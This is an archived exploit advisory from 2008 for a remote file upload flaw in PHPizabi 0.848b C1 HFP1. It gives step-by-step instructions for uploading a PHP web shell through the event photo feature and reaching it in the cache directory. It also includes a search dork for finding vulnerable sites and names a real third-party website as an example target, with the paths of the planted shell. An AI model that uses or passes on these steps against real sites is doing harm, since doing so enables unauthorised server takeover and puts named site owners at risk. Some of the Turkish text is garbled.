PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability
# Published : 2008-02-17
# Author : ZoRLu
# Previous Title : sCssBoard (pwnpack) Multiple Versions Remote Exploit
# Next Title : XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability

############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. g??zat button click and shell.php upload

-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kas??rga(lavrens), avkidis, head_hunter 

and all users yildirimordulari.org

siircicocuk nerelerdesin be kanka msn e tak??l ??zlettin kendini :)))

## yildirimordulari.org a?§??l??r m?? a?§??lmaz m?? oras?? bilinmez ama bilinen bir??ey var o bir efsane ##

#################################################

# www.Syue.com [2008-02-17]